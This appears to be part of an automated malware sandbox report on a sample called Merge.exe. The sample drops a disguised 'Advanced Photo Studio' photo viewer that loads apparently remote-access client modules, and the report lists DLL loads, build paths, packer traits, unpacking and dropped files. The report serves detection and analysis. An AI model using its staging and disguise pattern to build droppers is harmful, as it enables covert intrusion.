                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windows.ui.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windowmanagementapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wmnetmgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msv1_0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: ntlmshared.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: cryptdll.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wdigest.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: thumbcache.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: networkexplorer.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: avrt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: iconcodecservice.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wshunix.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile written: C:\Users\user\AppData\Local\3delite\Secondary Display Photo Viewer\DisplayPhotoViewer.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeWindow found: window name: TButtonJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: Merge.exeStatic PE information: certificate valid
                                Source: Merge.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                Source: Merge.exeStatic file information: File size 44935240 > 1048576
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile opened: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MSVCR100.dllJump to behavior
                                Source: Merge.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x95a400
                                Source: Merge.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x5dd600
                                Source: Merge.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1b4d600
                                Source: Merge.exeStatic PE information: More than 200 imports for KERNEL32.dll
                                Source: Merge.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3284744274.000000006C641000.00000020.00000001.01000000.00000019.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2635853467.000000000B06B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2617292451.000000000A8A1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3287171368.000000006F912000.00000002.00000001.01000000.00000017.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdbL source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdbN source: DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1201\1201\ctl32\release\pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdbGCTL source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
                                Source: Binary string: pcicapi.pdbm\1201\1201\ctl32\release\pcicapi.pdbH source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2627011351.0000000007AED000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944484464.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3124698930.000000000A720000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935540782.000000000A642000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201\AudioCapture\Release\AudioCapture.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2616773901.0000000007AEE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
                                Source: Merge.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: Merge.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: Merge.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: Merge.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: Merge.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                Detected unpacking (creates a PE file in dynamic memory)
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeUnpacked PE file: 6.2.DisplayPhotoViewer.exe.9650000.3.unpack
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1000DA20 _FreeImage_RegisterExternalPlugin@20,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,6_2_1000DA20
                                Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                                Source: RwcTouch.dll.0.drStatic PE information: real checksum: 0x299541 should be: 0x291542
                                Source: FreeImage.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x5c57fc
                                Source: bass.dll.0.drStatic PE information: section name:
                                Source: bass.dll.0.drStatic PE information: section name: petite
                                Source: DisplayPhotoViewer.exe.0.drStatic PE information: section name: .didata
                                Source: FilesystemDialogs.dll.0.drStatic PE information: section name: .didata
                                Source: FreeImage.dll.0.drStatic PE information: section name: _RDATA
                                Source: pcicl32.dll.6.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\Merge.exeCode function: 0_2_016AEABA push ecx; ret 0_2_016AEACD
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10275026 push ecx; ret 6_2_10275039
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10705B60 push eax; ret 6_2_10705B8E
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1115F709 push ecx; ret 6_2_1115F71C
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1103FCA1 push 3BFFFFFEh; ret 6_2_1103FCA6
                                Source: msvcr100.dll.6.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MediaInfo.dllJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\bass.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dllJump to dropped file
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\JEncrypt.dllJump to dropped file
